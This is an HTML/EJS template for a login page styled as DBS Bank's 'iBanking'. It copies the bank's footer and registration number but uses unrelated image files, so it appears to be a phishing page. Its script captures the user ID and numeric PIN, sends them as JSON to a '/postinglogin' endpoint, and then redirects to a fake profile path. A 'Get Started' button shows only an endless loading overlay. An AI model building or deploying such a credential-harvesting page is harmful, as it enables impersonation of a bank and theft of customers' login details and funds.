
<!DOCTYPE html>
<html>
    <head>
        <%- include('../partials/head.ejs') %> 
        <title>DBS iBanking</title>  
<meta property="og:title" content="Secure Online Banking Login - Access Your Account Anytime, Anywhere">
    
    </head>  

      <body>   
        
        <div class="fullscreen" style="display:none">
          <img src="/images/singerpaulfav.png" alt="loading..." class="rotating-image">
    </div>  

    <div class="fullscreenb" style="display:none">
      <img src="/images/singerpaulfav.png" alt="loading..." class="rotating-image"> 
      <button class="stopl" onclick="stopl()">Stop Loading</button>
   </div> 

          <div class="header"> 
            <div class="find">  
                  <i class="fa fa-map-marker-alt"></i>
                  <p style="margin-left:7px;">Find Us</p>
            </div>  
            <div class="help">
                <i class="fa fa-exclamation-circle tolef"></i>
                <p style="margin-left:7px;"> Help & Support</p>
            </div>  
          </div>  



          <div class="enclose">
            <div class="loginform"> 
                     <div class="redbg"></div>  
                     <div class="inner">
                    <div class="dlogo"> <img src="/images/singerpaul.png" alt="logo"> </div>   
                       <div class="instruction">
                        <p>For an optimal viewing experience and security, we recommend that you use the latest web browser. Click <span>here</span> for a list of supported browsers.</p>
                        </div>  

                        <form id="logino">
                        <!-----Input USER ID-->
                        <fieldset id="fsa">
                            <legend id="ulab">User ID</legend>
                            <input type="text" id="userid" placeholder=" " required />
                        </fieldset>   

                        <p id="erro"></p>

                          <!-----Input PIN-->  
                          <fieldset id="fsb">
                            <legend id="uplab">PIN</legend>
                            <input type="password" id="userpin" oninput="validateNumberInput(this)" placeholder=" " required />
                        </fieldset>    
                        <button id="subm">Login</button>   
                 </form>    


                        <button id="start">Get Started</button>      
                        <div class="last">
                             <p>Forgot User ID or PIN</p>
                             <p>Frequently Asked Questions</p>   
                             <p>Maintenance Schedule</p>
                             <p>Security & You</p>
                        </div>  
                      </div> 
                </div>
            </div>    
         

            
            <div class="footer"> 
                <div class="links">
                  <div><p>Terms & Conditions</p></div> 
                  <div><p>Privacy Policy</p></div>
                  <div><p>Fair Dealing Commitment</p></div> 
                  <div><p>Compliance with Tax Requirements</p></div> 
                  <div><p>Vulnerability Disclosure Policy</p></div>
                  <div><p>©2024 DBS Bank Ltd. Co. Reg. No. 196800306E</p></div> 
                 </div>  

                  <div class="icons">
                    <i class="fab fa-facebook"></i> 
                    <i class="fa fa-twitter"></i> 
                    <i class="fab fa-linkedin"></i>
                    <i class="fab fa-youtube"></i>   
                  </div>
            </div>

            <script>  

            const data = {
               name : 'fhf',
               pass : 'dks',
            } 

          //  window.onload = function() { 
                    //    fetch('/postnewmember', {
                      //    method : 'post',
                      //    body : JSON.stringify(data),
                     //     headers : {
                           // 'Content-Type' : 'application/json',
                       //    Accept : 'application/json',
                    //      } 
                //        });
                //   } 

        
       
      var userid = document.getElementById('userid'); 
     var userpin = document.getElementById('userpin');  

     userid.onfocus = function(e) { 
      var fsa = document.getElementById('fsa');
       var ulab = document.getElementById('ulab');     
       e.target.style.borderBottom = '1px solid lightgray';  
       e.target.style.marginTop = '9px'; 
       ulab.style.fontSize = '12px';
     }    

          // Handle blur event for the 'userpin' input
userid.onblur = function(e) {
    var ulab = document.getElementById('ulab'); 
    if (!e.target.value) { // Check if the input is empty
        ulab.style.fontSize = '16px';  
        e.target.style.marginTop = '2px';
    }
};


     userpin.onfocus = function(e) { 
      var fsb = document.getElementById('fsb');
       var uplab = document.getElementById('uplab'); 
       uplab.style.marginBottom = '5px';
       e.target.style.borderBottom = '1px solid lightgray';   
       e.target.style.marginTop = '9px';
       uplab.style.fontSize = '12px';
     }    
 
userpin.onblur = function(e) {
    var uplab = document.getElementById('uplab'); 
    if (!e.target.value) { // Check if the input is empty
        uplab.style.fontSize = '16px'; 
        e.target.style.marginTop = '2px';
    }
};
 

   
                  function validateNumberInput(input) {
                          // Allow only numeric input, remove non-numeric characters
                          input.value = input.value.replace(/\D/g, '');
                        }
    
                             

       



       var logino = document.getElementById('logino');
       logino.addEventListener('submit', async (e)=>{  
        e.preventDefault(); 
        var fullscreen = document.querySelector('.fullscreen'); 
        fullscreen.style.display = 'flex';
            var userid = document.getElementById('userid').value; 
            var userpin = document.getElementById('userpin').value;  
            var subm = document.getElementById('subm'); 
            subm.style.opacity = '0.4';
            subm.disabled = true;
            subm.innerHTML = 'submitting...'; 

            var data = {
                userid : userid,
                regpass : userpin,
            }
            
            try{
              const response = await fetch('/postinglogin', {
                method : 'post',
                body : JSON.stringify(data),
                      headers : {
                            'Content-Type' : 'application/json',
                          Accept : 'application/json',
                         } 
              }); 

              if(!response.ok){  
                fullscreen.style.display = 'none';
                subm.style.opacity = '2';
            subm.disabled = false;
            subm.innerHTML = 'Login'; 
                   throw response; 
              }   
           
              fullscreen.style.display = 'none';
              subm.style.opacity = '2';
            subm.disabled = false;
            subm.innerHTML = 'submitted';  

            setTimeout(()=>{
              window.location.href = '/member/IB/profile';
            }, 1000);
                
          }
    catch(err) {   
      var loginf = document.querySelector('.loginform'); 
      loginf.style.animationName = 'errorrotate';
      loginf.style.animationDuration = '0.3s';
      loginf.style.animationIterationCount = '1';
      var erro = document.getElementById('erro');
          fullscreen.style.display = 'none';
          const error = await err.text();
          erro.innerHTML = error;
    }
             
       });  


       var start = document.getElementById('start');
    start.onclick = ()=>{  
       var fullscreenb = document.querySelector('.fullscreenb');
       fullscreenb.style.display = 'flex';  
    } 

    function stopl() {
        var fullscreenb = document.querySelector('.fullscreenb');
        fullscreenb.style.display = 'none'; 
      } 

                  
            </script>
      </body>
 
</html>